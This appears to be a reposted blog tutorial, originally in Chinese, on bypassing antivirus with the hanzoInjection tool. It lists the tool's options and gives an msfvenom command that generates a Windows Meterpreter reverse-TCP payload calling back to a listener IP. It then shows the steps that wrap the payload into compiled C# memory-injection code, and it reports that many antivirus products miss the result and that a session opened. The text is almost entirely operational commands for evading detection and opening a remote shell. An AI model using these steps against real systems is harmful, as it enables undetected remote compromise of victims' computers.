bypassAV_hanzoInjection
source link: http://www.10tiao.com/html/665/201806/2650447378/3.html
Download hanzoInjection
git clone https://github.com/P0cL4bs/hanzoInjection.git
Usage:
Usage: HanzoInjection.exe [Options] [-h] [-e] [-o] [-p] [-b]
the HanzoIjection is a tool focused on injecting arbitrary codes in memory to
bypass common antivirus solutions.
Developer: Mharcos Nesster (mh4x0f)
Email:[email protected]
Site: www.chmodsecurity.com.br
Greetx: P0cL4bs Team { N4sss , MMXM , Chrislley, MovCode, joridos }
-------------------------------------------------------------------
Arguments Options:
OPTION TYPE DESCRIPTION
-e,--execute [.raw] Name of file.bin, payload metasploit type raw
-p,--payload [.raw] Payload meterpreter type [RAW] requered parameter -o [output]
-o,--output [file.cs] Output generate project file.cs injection memory payload c#
-b,--binder [NULL] Binder File EXE with encrypt file PE not requered paramenter
-h,--help [Help] show this help and exit
Example Usage:
HanzoInjection.exe -e payload_meterpreter.bin
HanzoInjection.exe -p meterpreter.bin -o injection_memory.cs
HanzoInjection.exe -b
Generate the payload
☁ ~ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.100 lport=4444 -f raw -o ~/Desktop/test.bin
Detection result:
Generate the .cs file with hanzoInjection:
☁ hanzoInjection [master] wine HanzoInjection.exe -p ~/Desktop/test.bin -o ~/Desktop/test.cs
Then compile the .cs file with Visual Studio:
If compilation fails, change the compiler settings to allow unsafe code (the project's "Allow unsafe code" option).
Detection results for the generated file:
Some engines still flag it, but it already gets past many AV products. In testing, the session came back online:
Source: Evi1cg's blog
Original link: https://evi1cg.me/archives/bypassAV_hanzoInjection.html